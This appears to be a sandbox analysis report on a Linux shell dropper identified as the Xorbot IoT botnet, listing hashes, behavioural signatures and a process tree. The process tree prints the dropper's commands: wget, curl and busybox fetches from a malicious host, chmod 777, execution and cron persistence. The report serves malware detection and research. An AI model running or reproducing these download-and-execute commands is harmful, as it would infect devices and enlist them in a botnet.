Overview

overview

10

Static

static

1

BZTS9_bins.sh

ubuntu-18.04-amd64

10

BZTS9_bins.sh

debian-9-armhf

10

BZTS9_bins.sh

debian-9-mips

10

BZTS9_bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    159s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28/02/2025, 12:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    BZTS9_bins.sh

  • Size

    10KB

  • MD5

    5f5a8beaeee13fdd7a462ebf3797535c

  • SHA1

    982824d6165ed0668b25d6765b631170fc8bbd1d

  • SHA256

    d3d3f91578e875f1bf3302e63df0e3d51179d6f4e0c3cdcdc4fd7eef1027fc81

  • SHA512

    1569973908da43ee2f414331f4f81ec6106545ec4140272be439351c81bf2e2b27877e9e444c1e7290f195510f59b475de7885999bcc273392e0a0a778b7f01a

  • SSDEEP

    96:YokU5Utt6LLnXIEgLsXasZeEINqKqCqE5FJLeOILQAQ8Q8rLNL04hyK1mZEZIZZy:75tgd4t/NYQ3SuaZNnEb7YQ3Su4ZNnY

Score
10/10
xorbotantivmbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • Detects Xorbot 2 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Contacts a large (1046) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 2 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalation
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 7 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/BZTS9_bins.sh
    /tmp/BZTS9_bins.sh
    1⤵
    • Executes dropped EXE
    PID:641
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:643
      • /usr/bin/wget
        wget http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:645
      • /usr/bin/curl
        curl -O http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:663
      • /bin/busybox
        /bin/busybox wget http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
        2⤵
        • System Network Configuration Discovery
        PID:749
      • /bin/chmod
        chmod 777 coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
        2⤵
        • File and Directory Permissions Modification
        PID:750
      • /tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
        ./coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
        2⤵
          PID:751
        • /bin/rm
          rm coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
          2⤵
            PID:753
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:754
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
            2⤵
            • Checks CPU configuration
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:757
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
            2⤵
            • System Network Configuration Discovery
            PID:764
          • /bin/chmod
            chmod 777 hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
            2⤵
            • File and Directory Permissions Modification
            PID:767
          • /tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
            ./hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
            2⤵
            • Renames itself
            • Reads runtime system information
            PID:768
            • /bin/sh
              sh -c "crontab -l"
              3⤵
                PID:770
                • /usr/bin/crontab
                  crontab -l
                  4⤵
                    PID:771
                • /bin/sh
                  sh -c "crontab -"
                  3⤵
                    PID:772
                    • /usr/bin/crontab
                      crontab -
                      4⤵
                      • Creates/modifies Cron job
                      PID:773
                • /bin/rm
                  rm hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
                  2⤵
                    PID:775
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X
                    2⤵
                    • System Network Configuration Discovery
                    PID:778

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F
                  Filesize

                  107KB

                  MD5

                  eb9c3a0de91fcf16ba17cb24608df68c

                  SHA1

                  09d95a7d70d5e115d103be51edff7c498d272fac

                  SHA256

                  dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

                  SHA512

                  9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

                  Download Submit

                • /tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74
                  Filesize

                  127KB

                  MD5

                  89077b7bd4bcafca7713be43635c4862

                  SHA1

                  fc02edb8fba29ea8ee99e6157ef8560334530052

                  SHA256

                  78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

                  SHA512

                  1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

                  Download Submit

                • /var/spool/cron/crontabs/tmp.3Vcknn
                  Filesize

                  210B

                  MD5

                  4588ed83db200714cb0f8357c4cb1bae

                  SHA1

                  bd2998c2fed9fbf043726453cb56b1d0e4879673

                  SHA256

                  c9f511aebeee58d66f554c6a1330fc92ecd1afa07b84575770fcdfb14570c150

                  SHA512

                  376db3de3c65c05053e413738c140a619a4a69b82cafb277157dc1e1a473dfa7285db874d9719f8f079407abb7bcc78e29e0cee5accc5e5aad3372835cf103f9

                  Download Submit